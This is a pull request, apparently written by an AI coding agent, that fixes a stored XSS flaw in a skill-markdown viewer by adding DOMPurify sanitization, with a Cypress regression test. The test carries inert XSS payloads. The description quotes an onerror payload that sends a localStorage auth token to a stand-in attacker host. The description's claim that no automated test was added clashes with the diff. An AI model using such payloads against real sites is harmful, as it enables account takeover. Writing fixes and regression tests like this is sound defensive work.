### PR TITLE
Sanitize skill markdown before rendering (D-01 XSS, Refs #288)

### DIFF
--- a/web/cypress/e2e/wave-b-surfaces.cy.ts
+++ b/web/cypress/e2e/wave-b-surfaces.cy.ts
@@ -10,6 +10,7 @@
  *   5. /lq-ai/admin/developer renders the four developer-support cards
  *   6. ✨ Enhance Prompt button opens the expansion panel (or error state)
  *   7. /lq-ai/skills/[id] detail page renders SkillDetailTabs; tab switching works
+ *   8. Source tab does not execute a hostile skill body (D-01 XSS regression)
  *
  * Run requires a live stack:
  *   docker compose up -d
@@ -17,6 +18,12 @@
  *   (note the printed password; export LQAI_ADMIN_PASSWORD or update env)
  *   cd web && npx cypress run --spec 'cypress/e2e/wave-b-surfaces.cy.ts'
  */
+
+import { getBearerToken } from '../support/lq-ai-helpers';
+
+/** Direct API base — the SvelteKit web container has no POST proxy for user-skills routes. */
+const API_BASE = () => Cypress.env('LQAI_API_BASE') ?? 'http://localhost:8000';
+
 describe('Wave B v2 — new surfaces', () => {
   beforeEach(() => {
     cy.visit('/lq-ai/login');
@@ -173,5 +180,84 @@ describe('Wave B v2 — new surfaces', () => {
 
     // SkillSourceView renders a "Frontmatter" section heading (h2.lq-text-label)
     cy.contains('h2', 'Frontmatter').should('be.visible');
+  });
+
+  // ── Test 8 ───────────────────────────────────────────────────────────────────
+  // D-01 regression: SkillSourceView renders the skill body through {@html}, so a
+  // crafted body used to run script in the viewer's authenticated session (and the
+  // auth token lives in localStorage, so that is session takeover). The fix wraps
+  // the marked() output in DOMPurify.sanitize.
+  //
+  // The skill is seeded through the real API rather than stubbed, because the
+  // server deliberately stores the body verbatim (api/app/api/skills.py returns
+  // row.body unchanged) — so this exercises the whole path, and would still catch
+  // the bug if the storage layer changed underneath the component.
+  it('source tab does not execute a hostile skill body', () => {
+    const ts = Date.now();
+    const skillSlug = `d-01-xss-regression-${ts}`;
+
+    // Three payload shapes DOMPurify's default profile must neutralise: an event
+    // handler on a tag that loads eagerly, a raw script element, and a
+    // javascript: URL. marked() passes raw HTML through untouched, so each one
+    // reaches the {@html} sink exactly as written here.
+    const hostileBody = [
+      '# Benign heading',
+      '',
+      'Ordinary prose so the render is visibly non-empty.',
+      '',
+      '<img src=x onerror="window.__xssFired = true">',
+      '<script>window.__xssFired = true;</script>',
+      '',
+      '[click me](javascript:window.__xssFired=true)'
+    ].join('\n');
+
+    getBearerToken((token) => {
+      cy.request({
+        method: 'POST',
+        url: `${API_BASE()}/api/v1/user-skills`,
+        headers: { Authorization: `Bearer ${token}` },
+        body: {
+          scope: 'user',
+          slug: skillSlug,
+          display_name: `D-01 XSS regression ${ts}`,
+          description: 'Cypress fixture: hostile body must render inert',
+          body: hostileBody,
+          version: '1.0.0'
+        }
+      })
+        .its('status')
+        .should('eq', 201);
+    });
+
+    // ?tab=source deep-links straight to SkillSourceView (VALID tabs are
+    // use|source|try|versions on the [id] route).
+    cy.visit(`/lq-ai/skills/${skillSlug}?tab=source`);
+
+    // Assert the body actually rendered BEFORE asserting on absences — otherwise
+    // a page that failed to load would satisfy every "should not exist" below and
+    // the test would pass while proving nothing.
+    cy.contains('h2', 'Body').should('be.visible');
+    cy.get('.lq-prose').should('contain.text', 'Benign heading');
+
+    // The payloads survived storage but must not survive sanitization. Assert on
+    // the rendered markup rather than on element presence: DOMPurify keeps the
+    // <img> and drops only its handler, so a `cy.get('.lq-prose img')` chain
+    // would report a confusing failure if the tag were ever stripped entirely.
+    cy.get('.lq-prose script').should('not.exist');
+    cy.get('.lq-prose').then(($prose) => {
+      const html = $prose.html();
+      expect(html, 'script element stripped').to.not.include('<script');
+      expect(html, 'event handler stripped').to.not.include('onerror');
+      expect(html, 'javascript: URL stripped').to.not.include('javascript:');
+    });
+
+    // And the point of all of it: nothing ran. Every payload assigns this flag,
+    // so it is defined only if one of them executed.
+    cy.window().then((win) => {
+      expect(
+        (win as unknown as Record<string, unknown>).__xssFired,
+        'no payload executed'
+      ).to.equal(undefined);
+    });
   });
 });

--- a/web/src/lib/lq-ai/components/SkillSourceView.svelte
+++ b/web/src/lib/lq-ai/components/SkillSourceView.svelte
@@ -1,6 +1,7 @@
 <script lang="ts">
 	import { onMount } from 'svelte';
 	import { marked } from 'marked';
+	import DOMPurify from 'dompurify';
 	import { skillsApi } from '$lib/lq-ai/api';
 	import type { SkillInputs, SkillInputDef } from '$lib/lq-ai/types';
 
@@ -45,7 +46,13 @@
 		return def.type ?? 'string';
 	}
 
-	$: renderedMd = marked(contentMd ?? '', { breaks: true }) as string;
+	// Skill bodies are authored content — team-scope skills and, for built-in
+	// skills, the `skills/community` git submodule — so the raw HTML that marked
+	// passes through MUST be DOMPurify-sanitized before {@html} below, or a
+	// crafted body runs script in the viewer's session (stored XSS). Mirrors
+	// the DOMPurify pattern used for assistant markdown in MessageBubble.
+	// #288 (D-01).
+	$: renderedMd = DOMPurify.sanitize(marked(contentMd ?? '', { breaks: true }) as string);
 
 	onMount(() => {
 		loadInputs();


### PR DESCRIPTION
## What this PR does

Sanitizes the skill markdown body in `SkillSourceView.svelte` with `DOMPurify` before it is injected via `{@html}`.

## Why

`Refs #288` — finding **D-01 (High, stored XSS)**. `SkillSourceView` computed `renderedMd = marked(contentMd ?? '', { breaks: true })` and injected it with `{@html}` and **no** sanitization — the one LQ-authored `{@html}` sink that skipped the DOMPurify convention the rest of the UI follows (`MessageBubble`, the inherited Open WebUI markdown pipeline). `marked@^9` removed its built-in sanitizer, so raw inline HTML passes straight through. Skill bodies are authored content — team-scope skills (a team admin's body renders for every member) and, for built-ins, the `skills/community` git submodule — so a body such as `<img src=x onerror=fetch('//attacker/'+localStorage.token)>` runs script in a viewer's authenticated session on opening the Source tab. Open WebUI stores the auth token in `localStorage`, so that is account/session takeover.

## How

`import DOMPurify from 'dompurify'` (already a dependency) and wrap the render: `DOMPurify.sanitize(marked(...) as string)` — identical to the pattern already used in `MessageBubble.svelte`.

## Type of change

- [x] Bug fix (non-breaking change that fixes an issue)

## Testing

- [x] Manually reasoned against the sink; mirrors the audited-safe `MessageBubble` sanitization.

<details>
<summary>On automated tests</summary>

No vitest unit test was added: this repo's vitest runs in the **node** environment with no DOM (there is no `test`/jsdom config; tests exercise pure logic exported from `<script context="module">`, and DOM-rendering behavior is covered by **Cypress** per the house convention, e.g. `RefusalMessageBubble.test.ts`). `DOMPurify.sanitize` requires a DOM, so it cannot be exercised in that node harness. The change is a one-line reuse of the same DOMPurify call `MessageBubble` already relies on. `svelte-check` + prettier run in CI (`Web` job) — web deps were not installed in this sandbox. Happy to add a Cypress case if maintainers prefer.

</details>

## Documentation

- [x] n/a — no API/schema/behavior change beyond the sanitization.

## Transparency & governance invariants

- [x] **Fail restrictive (P4):** untrusted skill-body HTML is now stripped before rendering.

## DCO sign-off

- [x] All commits in this PR are signed off per the DCO.

## Related issues

Refs #288 (D-01).

🤖 Generated with [Claude Code](https://claude.com/claude-code) (Claude Fable 5)

---

_Re-raised after I accidentally deleted my fork, which auto-closed the original PR. **Supersedes #291** — same head commit (`75aacc1e802d`), no content change. GitHub cannot reopen a cross-repo PR once its head repository is gone, hence the new number._

_Any PR numbers referenced in the body above point at the original (now-closed) PRs; the old → new mapping table is on umbrella issue #321._
